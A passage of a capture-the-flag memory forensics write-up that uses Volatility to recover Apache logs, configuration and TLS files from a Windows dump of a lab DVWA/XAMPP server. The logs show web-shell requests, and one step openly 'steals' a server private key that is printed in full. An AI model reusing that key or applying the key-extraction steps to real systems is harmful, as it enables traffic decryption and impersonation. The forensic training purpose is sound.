</pre><div><br /></div></div></div><div><br /></div><div>Extract the files from their memory address:</div></div><div><br /></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">~/volatility3/vol.py --output-dir access_log/ --file SECURITYNIK-WIN-20231116-235706.dmp windows.dumpfiles </span><b><span style="color: #fcff01;">--virtaddr 0xe78bf4c62130</span></b><span style="color: white;">
Volatility 3 Framework 2.5.2
Progress: 100.00 PDB scanning finished
Cache FileObject FileName Result
DataSectionObject 0xe78bf4c62130 access.log file.0xe78bf4c62130.0xe78bf6c3fdf0.DataSectionObject.access.log.dat
SharedCacheMap 0xe78bf4c62130 access.log file.0xe78bf4c62130.0xe78bf6564d20.SharedCacheMap.access.log.vacb
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ~/volatility3/vol.py --output-dir access_log/ --file SECURITYNIK-WIN-20231116-235706.dmp windows.dumpfiles </span><span style="color: #fcff01;"><b>--virtaddr 0xe78bf6e72980</b></span><span style="color: white;">
Volatility 3 Framework 2.5.2
Progress: 100.00 PDB scanning finished
Cache FileObject FileName Result
DataSectionObject 0xe78bf6e72980 access.log file.0xe78bf6e72980.0xe78bf6c3fdf0.DataSectionObject.access.log.dat
SharedCacheMap 0xe78bf6e72980 access.log file.0xe78bf6e72980.0xe78bf6564d20.SharedCacheMap.access.log.vacb
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ~/volatility3/vol.py --output-dir access_log/ --file SECURITYNIK-WIN-20231116-235706.dmp windows.dumpfiles </span><span style="color: #fcff01;"><b>--virtaddr 0xe78bf6e72ca0
Volatility 3 Framework 2.5.2</b></span><span style="color: white;">
Progress: 100.00 PDB scanning finished
Cache FileObject FileName Result
DataSectionObject 0xe78bf6e72ca0 access.log file.0xe78bf6e72ca0.0xe78bf6c3fdf0.DataSectionObject.access.log.dat
SharedCacheMap 0xe78bf6e72ca0 access.log file.0xe78bf6e72ca0.0xe78bf6564d20.SharedCacheMap.access.log.vacb
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ~/volatility3/vol.py --output-dir access_log/ --file SECURITYNIK-WIN-20231116-235706.dmp windows.dumpfiles </span><span style="color: #fcff01;"><b>--virtaddr 0xe78bf6e75d10</b></span><span style="color: white;">
Volatility 3 Framework 2.5.2
Progress: 100.00 PDB scanning finished
Cache FileObject FileName Result
DataSectionObject 0xe78bf6e75d10 access.log file.0xe78bf6e75d10.0xe78bf6c3fdf0.DataSectionObject.access.log.dat
SharedCacheMap 0xe78bf6e75d10 access.log file.0xe78bf6e75d10.0xe78bf6564d20.SharedCacheMap.access.log.vacb
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ~/volatility3/vol.py --output-dir access_log/ --file SECURITYNIK-WIN-20231116-235706.dmp windows.dumpfiles </span><b><span style="color: #fcff01;">--virtaddr 0xe78bf6e76800</span></b><span style="color: white;">
Volatility 3 Framework 2.5.2
Progress: 100.00 PDB scanning finished
Cache FileObject FileName Result
DataSectionObject 0xe78bf6e76800 access.log file.0xe78bf6e76800.0xe78bf6c3fdf0.DataSectionObject.access.log.dat
SharedCacheMap 0xe78bf6e76800 access.log file.0xe78bf6e76800.0xe78bf6564d20.SharedCacheMap.access.log.vacb</span>
</pre></div></div><div><br /></div></div></div><div><div><b>Q:</b> Upon dumping the memory address how many files are created?</div><div><b>A:</b> 10 files were reported for the 5 memory addresses which were extracted:</div></div><div><br /></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">ls
file.0xe78bf4c62130.0xe78bf6564d20.SharedCacheMap.access.log.vacb
file.0xe78bf4c62130.0xe78bf6c3fdf0.DataSectionObject.access.log.dat
file.0xe78bf6e72980.0xe78bf6564d20.SharedCacheMap.access.log.vacb
file.0xe78bf6e72980.0xe78bf6c3fdf0.DataSectionObject.access.log.dat
file.0xe78bf6e72ca0.0xe78bf6564d20.SharedCacheMap.access.log.vacb
file.0xe78bf6e72ca0.0xe78bf6c3fdf0.DataSectionObject.access.log.dat
file.0xe78bf6e75d10.0xe78bf6564d20.SharedCacheMap.access.log.vacb
file.0xe78bf6e75d10.0xe78bf6c3fdf0.DataSectionObject.access.log.dat
file.0xe78bf6e76800.0xe78bf6564d20.SharedCacheMap.access.log.vacb
file.0xe78bf6e76800.0xe78bf6c3fdf0.DataSectionObject.access.log.dat
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024/access_log]
└─$ ls | wc --lines
10</span>
</pre></div></div><div><br /></div></div><div><div>Now that we have the files, let's answer the following question.</div><div><br /></div><div><b>Q:</b> What is/are the IP address(es) and its/their count(s) for the IP(s) seen in all the "<i>access.log</i>" files?</div><div><b>A:</b> </div></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">cat access_log/* | sort --unique | awk --field-separator='-' '{ print $1 }' | sort | uniq --count
...
57 10.0.0.1
19 10.0.0.110</span>
</pre><div><br /></div></div></div><div><br /></div></div></div><div><div>There is a device which seems to be accessing our webserver with a non-standard GUI based browser. </div><div><br /></div><div><b>Q:</b> What is the IP of this host?</div><div><b>A:</b> 10.0.0.110</div><div><br /></div><div><b>Q:</b> What is the HTTP Method/Verb used by this non GUI based browser tool?</div><div><b>A:</b> "GET"</div><div><br /></div><div><b>Q:</b> What are the URLs accessed.</div><div><b>A:</b> "<i>/dvwa/vulnerabilities/exec/shell.php"</i></div><div><br /></div><div><b>Q</b>: What version of HTTP is in use?</div><div><b>A</b>: HTTP/1.1</div><div><br /></div><div><b>Q</b>: What was/were the response code(s)</div><div><b>A</b>: 200. </div><div><br /></div><div><b>Q:</b> For the response code(s), is/are this/these server and client codes?</div><div><b>A:</b> Both Client and server. Server is 200 successful, 404 is client side error.</div><div><br /></div><div><b>Q:</b> What is the size of the smallest size of the object/response returned to the requestor using this non-GUI based browser?</div><div><b>A: 29</b></div><div><br /></div><div><b>Q:</b> What is the size of the largest size of the object/response returned to the requestor using this non-GUI based browser?</div><div><b>A:</b> 2888</div><div><br /></div><div><b>Q:</b> What is the name of the non-standard GUI based browser?</div><div><b>A:</b> curl</div><div><br /></div><div><b>Q:</b> What version of this non-GUI browser was being used?</div><div><b>A:</b> 8.4.0</div><div><br /></div><div>Below we see a sample of these entries.</div><div><br /></div><div>See below for the answer to all the questions.</div></div></div><div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">cat access_log/* | sort --unique | grep --color=always --text 'curl'
10.0.0.110 - - [16/Nov/2023:18:19:50 -0500] "GET /dvwa/vulnerabilities/exec/shell.php HTTP/1.1" 200 335 "-" "curl/8.4.0"
10.0.0.110 - - [16/Nov/2023:18:20:11 -0500] "GET /dvwa/vulnerabilities/exec/shell.php HTTP/1.1" 200 335 "-" "curl/8.4.0"
10.0.0.110 - - [16/Nov/2023:18:24:45 -0500] "GET /dvwa/vulnerabilities/exec/shell.php HTTP/1.1" 200 335 "-" "curl/8.4.0"
10.0.0.110 - - [16/Nov/2023:18:26:37 -0500] "GET /dvwa/vulnerabilities/exec/shell.php HTTP/1.1" 200 335 "-" "curl/8.4.0"
10.0.0.110 - - [16/Nov/2023:18:26:54 -0500] "GET /dvwa/vulnerabilities/exec/shell.php HTTP/1.1" 200 335 "-" "curl/8.4.0"
10.0.0.110 - - [16/Nov/2023:18:28:01 -0500] "GET /dvwa/vulnerabilities/exec/main.php HTTP/1.1" 404 297 "-" "curl/8.4.0"
10.0.0.110 - - [16/Nov/2023:18:28:09 -0500] "GET /dvwa/vulnerabilities/exec/shell.php HTTP/1.1" 200 335 "-" "curl/8.4.0"
10.0.0.110 - - [16/Nov/2023:18:28:25 -0500] "GET /dvwa/vulnerabilities/exec/shell.php HTTP/1.1" 200 335 "-" "curl/8.4.0"
10.0.0.110 - - [16/Nov/2023:18:36:02 -0500] "GET /dvwa/hackable/uploads/shell.php HTTP/1.1" 404 297 "-" "curl/8.4.0"
10.0.0.110 - - [16/Nov/2023:18:36:09 -0500] "GET /dvwa/hackable/upload/shell.php HTTP/1.1" 404 297 "-" "curl/8.4.0"
10.0.0.110 - - [16/Nov/2023:18:37:32 -0500] "GET /dvwa/vulnerabilities/upload/shell.php HTTP/1.1" 200 29 "-" "curl/8.4.0"
10.0.0.110 - - [16/Nov/2023:18:41:22 -0500] "GET /dvwa/vulnerabilities/upload/shell.php HTTP/1.1" 200 2888 "-" "curl/8.4.0"</span>
</pre></div></div><div><br /></div><div><b>Q:</b> When was the date of this version release and how many known vulnerabilities are associated with it?</div><div><b>A:</b> Date of release was Oct 11, 2023 and there are 2 known vulnerabilities.</div><div> #<span style="white-space: pre;"> </span>Version<span style="white-space: pre;"> </span>Date<span style="white-space: pre;"> </span>Vulns</div><div>252<span style="white-space: pre;"> </span>8.4.0<span style="white-space: pre;"> </span>Oct 11 2023<span style="white-space: pre;"> </span>2</div><div><br /></div><div>Wrapping this section up</div><div><br /></div><div><b>Q:</b> What is the name of the Web Application being used and the platform it is running on?</div><div><b>A:</b> The answer is seen above DVWA.</div><div> As for the platform, it is XAMPP, see below.</div></div><div><br /></div></div><div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">cat filescan.txt | grep dvwa
0xe78bf4c54e40 \xampp\htdocs\dvwa\dvwa\css\main.css 216
0xe78bf620d400 \xampp\htdocs\dvwa\config 216
0xe78bf620e530 \xampp\htdocs\dvwa\config 216
0xe78bf6aac8a0 \xampp\mysql\data\dvwa\db.opt 216
0xe78bf6ac6840 \xampp\htdocs\dvwa\vulnerabilities\exec\source\low.php 216
0xe78bf6e4fd40 \xampp\htdocs\dvwa\vulnerabilities\upload\index.php 216
0xe78bf6e5f100 \xampp\htdocs\dvwa\dvwa\includes\dvwaPage.inc.php 216
0xe78bf6e5f420 \xampp\htdocs\dvwa\config\config.inc.php 216
0xe78bf6e619a0 \xampp\htdocs\dvwa\index.php 216
0xe78bf6e635c0 \xampp\htdocs\dvwa\dvwa\js\dvwaPage.js 216
0xe78bf6e63d90 \xampp\htdocs\dvwa\dvwa\js\add_event_listeners.js 216
0xe78bf6e65b40 \xampp\htdocs\dvwa\favicon.ico 216
0xe78bf6e66c70 \xampp\mysql\data\dvwa\users.ibd 216
0xe78bf6e67da0 \xampp\htdocs\dvwa\dvwa\images\logo.png 216
0xe78bf6e680c0 \xampp\mysql\data\dvwa\guestbook.ibd 216
0xe78bf6e68a20 \xampp\htdocs\dvwa\vulnerabilities\upload\source\low.php 216
0xe78bf792b090 \xampp\htdocs\dvwa\vulnerabilities\exec\index.php 216</span>
</pre></div></div><div><br /></div><div>Let's learn a bit about the web server configuration, at the time of this host being compromised.</div><div><br /></div><div>Create a directory to dump the HTTP contents.</div></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">mkdir httpd_dump</span>
</pre></div></div><div><br /></div></div><div><div>Locate the memory address of the <i>httpd.conf</i> file</div></div></div><div><br /></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">cat filescan.txt | grep httpd.conf
0xe78bf6e61b30 \xampp\apache\conf\httpd.conf 216</span>
</pre><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;"><br /></span></pre><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ~/volatility3/vol.py --output-dir httpd_dump/ --file SECURITYNIK-WIN-20231116-235706.dmp windows.dumpfiles --virtaddr 0xe78bf6e61b30
Volatility 3 Framework 2.5.2
Progress: 100.00 PDB scanning finished
Cache FileObject FileName Result
DataSectionObject 0xe78bf6e61b30 httpd.conf file.0xe78bf6e61b30.0xe78bf66e0450.DataSectionObject.httpd.conf.dat</span></pre></div></div><div><br /></div></div><div><div>With the file extracted, let's ask some questions </div><div><br /></div><div><b>Q:</b> What is the configured "ServerRoot" for the web server?</div><div><b>A:</b> "C:/xampp/apache"</div><div><br /></div><div><b>Q:</b> What port is the server configured to listen on?</div><div><b>A:</b> 80: </div><div><br /></div><div><b>Q:</b> What is the "User" name the server is configured to run as?</div><div><b>A: </b>daemon</div><div><br /></div><div><b>Q:</b> What is the "Group" name the server is configured to run as?</div><div><b>A:</b> daemon</div><div><br /></div><div><b>Q:</b> What is the "ServerAdmin" email address</div><div><b>A:</b> postmaster@localhost</div><div><br /></div><div><b>Q:</b> What is the "ServerName"</div><div><b>A:</b> ServerName localhost:80</div><div><br /></div><div><b>Q:</b> What is the path to the error log:</div><div><b>A:</b> ErrorLog "logs/error.log"</div><div><br /></div><div><b>Q:</b> What is the current logging level configuration</div><div><b>A:</b> LogLevel warn</div><div><br /></div><div>Below shows the evidence for above:</div></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">grep --text --perl-regexp --ignore-case </span><b><span style="color: #fcff01;">'</span></b><span style="color: #fcff01;"><b>^(ServerRoot|Listen|User|Group|ServerAdmin|ServerName|ErrorLog|LogLevel)'</b></span><span style="color: white;"> httpd_dump/file.0xe78bf6e61b30.0xe78bf66e0450.DataSectionObject.httpd.conf.dat
ServerRoot "C:/xampp/apache"
Listen 80
User daemon
Group daemon
ServerAdmin postmaster@localhost
ServerName localhost:80
ErrorLog "logs/error.log"
LogLevel warn</span>
</pre><div><br /></div></div></div><div><br /></div></div><div><div>Let's attempt to steal the server's private key and its certificate. This way, we can decrypt any communication encrypted by this private key.</div><div>A similar compromised actually occurred at Microsoft Corp, where a signing key was stolen. </div></div><div><br /></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">cat filescan.txt | </span><b><span style="color: #fcff01;">grep --perl-regexp 'server\.key|server.crt'</span></b><span style="color: white;">
0xe78bf79354a0 \xampp\apache\conf\ssl.crt\server.crt 216
0xe78bf7938510 \xampp\apache\conf\ssl.key\server.key 216</span>
</pre></div></div><div><br /></div></div><div><div>Create a directory to store the contents.</div></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">mkdir ssl_dump</span></pre></div></div></div><div><br /></div><div><div>Grab the certificate first</div></div><div><br /></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">~/volatility3/vol.py --output-dir ssl_dump/ --file SECURITYNIK-WIN-20231116-235706.dmp windows.dumpfiles </span><span style="color: #fcff01;"><b>--virtaddr 0xe78bf79354a0</b></span><span style="color: white;">
Volatility 3 Framework 2.5.2
Progress: 100.00 PDB scanning finished
Cache FileObject FileName Result
DataSectionObject 0xe78bf79354a0 server.crt file.0xe78bf79354a0.0xe78bf6c41970.DataSectionObject.server.crt.dat</span>
</pre></div></div><div><br /></div></div><div><div>Confirm the certificate file<br /><br /></div></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><b><span style="color: #fcff01;">file </span></b><span style="color: white;">ssl_dump/file.0xe78bf79354a0.0xe78bf6c41970.DataSectionObject.server.crt.dat
ssl_dump/file.0xe78bf79354a0.0xe78bf6c41970.DataSectionObject.server.crt.dat: </span><b><span style="color: #fcff01;">PEM certificate</span></b>
</pre></div></div><div><br /></div></div><div><div>We see above is PEM (Privacy Enhanced Mail) file. These files may contain the public certificate or the entire SSL chain which may include the private and public keys, along with other information on root and intermediate certificates. Interesting start. This file is base64 encoded.</div><div><br /></div><div>Confirming we were able to recover the first part.</div></div><div><br /></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">cat ssl_dump/file.0xe78bf79354a0.0xe78bf6c41970.DataSectionObject.server.crt.dat
-----BEGIN CERTIFICATE-----
MIIBnzCCAQgCCQC1x1LJh4G1AzANBgkqhkiG9w0BAQUFADAUMRIwEAYDVQQDEwls
b2NhbGhvc3QwHhcNMDkxMTEwMjM0ODQ3WhcNMTkxMTA4MjM0ODQ3WjAUMRIwEAYD
VQQDEwlsb2NhbGhvc3QwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAMEl0yfj
7K0Ng2pt51+adRAj4pCdoGOVjx1BmljVnGOMW3OGkHnMw9ajibh1vB6UfHxu463o
J1wLxgxq+Q8y/rPEehAjBCspKNSq+bMvZhD4p8HNYMRrKFfjZzv3ns1IItw46kgT
gDpAl1cMRzVGPXFimu5TnWMOZ3ooyaQ0/xntAgMBAAEwDQYJKoZIhvcNAQEFBQAD
gYEAavHzSWz5umhfb/MnBMa5DL2VNzS+9whmmpsDGEG+uR0kM1W2GQIdVHHJTyFd
aHXzgVJBQcWTwhp84nvHSiQTDBSaT6cQNQpvag/TaED/SEQpm0VqDFwpfFYuufBL
vVNbLkKxbK2XwUvu0RxoLdBMC/89HqrZ0ppiONuQ+X2MtxE=
-----END CERTIFICATE-----</span>
</pre></div></div><div><br /></div></div><div><div>Well it looks like this only contains the public key certificate information. With this in place, time for some questions.</div><div><br /></div><div><b>Q:</b> What is the server "Certificate" "Serial Number"?</div><div><b>A:</b> b5:c7:52:c9:87:81:b5:03</div><div><br /></div><div><b>Q:</b> What is the server "Certificate" "Validity" period:</div><div><b>A:</b> Validity</div><div> Not Before: Nov 10 23:48:47 2009 GMT</div><div> Not After : Nov 8 23:48:47 2019 GMT</div><div><span style="white-space: pre;"> </span></div><div><b>Q:</b> What is the server "Certificate" "Subject"?</div><div><b>A:</b> Subject: CN = localhost</div><div><br /></div><div><b>Q:</b> What "Public Key Algorithm" is used by the certificate?</div><div><b>A:</b> Public Key Algorithm: rsaEncryption</div><div><br /></div><div><b>Q:</b> How many bits are used for the "Public-Key"</div><div><b>A:</b> Public-Key: (1024 bit)</div><div><br /></div><div><b>Q:</b> What "Signature Algorithm" is used?</div><div><b>A:</b> sha1WithRSAEncryption</div><div><br /></div><div>Below provides the answer to these questions.</div></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">openssl x509 -in ssl_dump/file.0xe78bf79354a0.0xe78bf6c41970.DataSectionObject.server.crt.dat -text -noout
Certificate:
Data:
Version: 1 (0x0)
Serial Number:
b5:c7:52:c9:87:81:b5:03
Signature Algorithm: sha1WithRSAEncryption
Issuer: CN = localhost
Validity
Not Before: Nov 10 23:48:47 2009 GMT
Not After : Nov 8 23:48:47 2019 GMT
Subject: CN = localhost
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
Public-Key: (1024 bit)
Modulus:
00:c1:25:d3:27:e3:ec:ad:0d:83:6a:6d:e7:5f:9a:
75:10:23:e2:90:9d:a0:63:95:8f:1d:41:9a:58:d5:
9c:63:8c:5b:73:86:90:79:cc:c3:d6:a3:89:b8:75:
bc:1e:94:7c:7c:6e:e3:ad:e8:27:5c:0b:c6:0c:6a:
f9:0f:32:fe:b3:c4:7a:10:23:04:2b:29:28:d4:aa:
f9:b3:2f:66:10:f8:a7:c1:cd:60:c4:6b:28:57:e3:
67:3b:f7:9e:cd:48:22:dc:38:ea:48:13:80:3a:40:
97:57:0c:47:35:46:3d:71:62:9a:ee:53:9d:63:0e:
67:7a:28:c9:a4:34:ff:19:ed
Exponent: 65537 (0x10001)
Signature Algorithm: sha1WithRSAEncryption
Signature Value:
6a:f1:f3:49:6c:f9:ba:68:5f:6f:f3:27:04:c6:b9:0c:bd:95:
37:34:be:f7:08:66:9a:9b:03:18:41:be:b9:1d:24:33:55:b6:
19:02:1d:54:71:c9:4f:21:5d:68:75:f3:81:52:41:41:c5:93:
c2:1a:7c:e2:7b:c7:4a:24:13:0c:14:9a:4f:a7:10:35:0a:6f:
6a:0f:d3:68:40:ff:48:44:29:9b:45:6a:0c:5c:29:7c:56:2e:
b9:f0:4b:bd:53:5b:2e:42:b1:6c:ad:97:c1:4b:ee:d1:1c:68:
2d:d0:4c:0b:ff:3d:1e:aa:d9:d2:9a:62:38:db:90:f9:7d:8c:
b7:11</span>
</pre><div><br /></div></div></div><div><br /></div></div><div><div>Time to grab the private key</div></div><div><br /></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">~/volatility3/vol.py --output-dir ssl_dump/ --file SECURITYNIK-WIN-20231116-235706.dmp windows.dumpfiles </span><b><span style="color: #fcff01;">--virtaddr 0xe78bf7938510</span></b><span style="color: white;">
Volatility 3 Framework 2.5.2
Progress: 100.00 PDB scanning finished
Cache FileObject FileName Result
DataSectionObject 0xe78bf7938510 server.key file.0xe78bf7938510.0xe78bf6c3fb70.DataSectionObject.server.key.dat
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ </span><b style="color: white;">file </b><span style="color: white;">ssl_dump/file.0xe78bf7938510.0xe78bf6c3fb70.DataSectionObject.server.key.dat
ssl_dump/file.0xe78bf7938510.0xe78bf6c3fb70.DataSectionObject.server.key.dat: </span><b><span style="color: #fcff01;">PEM RSA private key</span></b><span style="color: white;">
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat ssl_dump/file.0xe78bf7938510.0xe78bf6c3fb70.DataSectionObject.server.key.dat
-----</span><b><span style="color: #fcff01;">BEGIN RSA PRIVATE KEY</span></b><span style="color: white;">-----
MIICXQIBAAKBgQDBJdMn4+ytDYNqbedfmnUQI+KQnaBjlY8dQZpY1ZxjjFtzhpB5
zMPWo4m4dbwelHx8buOt6CdcC8YMavkPMv6zxHoQIwQrKSjUqvmzL2YQ+KfBzWDE
ayhX42c7957NSCLcOOpIE4A6QJdXDEc1Rj1xYpruU51jDmd6KMmkNP8Z7QIDAQAB
AoGBAJvUs58McihQrcVRdIoaqPXjrei1c/DEepnFEw03EpzyYdo8KBZM0Xg7q2KK
gsM9U45lPQZTNmY6DYh5SgYsQ3dGvocvwndq+wK+QsWH8ngTYqYqwUBBCaX3kwgk
nAc++EpRRVmV0dJMdXt3xAUKSXnDP9fLPdKXffJoG7C1HHVVAkEA+087rR2FLCjd
Rq/9WhIT/p2U0RRQnMJyQ74chIJSbeyXg8Ell5QxhSg7skrHSZ0cBPhyaLNDIZkn
3NMnK2UqhwJBAMTAsUorHNo4dGpO8y2HE6QXxeuX05OhjiO8H2hmmcuMi2C9OwGI
rI+lx1Q8mK261NKJh7sSVwQikh5YQYLKcOsCQQD6YqcChDb7GHvewdmatAhX1ok/
Bw6KIPHXrMKdA3s9KkyLaRUbQPtVwBA6Q2brYS1Zhm/3ASQRhZbB3V9ZTSJhAkB7
72097P5Vr24VcPnZWdbTbG4twwtxWTix5dRa7RY/k55QJ6K9ipw4OBLhSvJZrPBW
Vm97NUg+wJAOMUXC30ZVAkA6pDgLbxVqkCnNgh2eNzhxQtvEGE4a8yFSUfSktS9U
bjAATRYXNv2mAms32aAVKTzgSTapEX9M1OWdk+/yJrJs
-----</span><b><span style="color: #fcff01;">END RSA PRIVATE KEY</span></b><span style="color: white;">-----</span>
</pre></div></div><div><br /></div></div><div><div>This now proves that we have the private key. Peaking into the private key</div></div><div><br /></div><div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">openssl rsa -in ssl_dump/file.0xe78bf7938510.0xe78bf6c3fb70.DataSectionObject.server.key.dat -noout -text | head --lines=10
Private-Key: (1024 bit, 2 primes)
modulus:
00:c1:25:d3:27:e3:ec:ad:0d:83:6a:6d:e7:5f:9a:
75:10:23:e2:90:9d:a0:63:95:8f:1d:41:9a:58:d5:
9c:63:8c:5b:73:86:90:79:cc:c3:d6:a3:89:b8:75:
bc:1e:94:7c:7c:6e:e3:ad:e8:27:5c:0b:c6:0c:6a:
f9:0f:32:fe:b3:c4:7a:10:23:04:2b:29:28:d4:aa:
f9:b3:2f:66:10:f8:a7:c1:cd:60:c4:6b:28:57:e3:
67:3b:f7:9e:cd:48:22:dc:38:ea:48:13:80:3a:40:
97:57:0c:47:35:46:3d:71:62:9a:ee:53:9d:63:0e:
...</span>
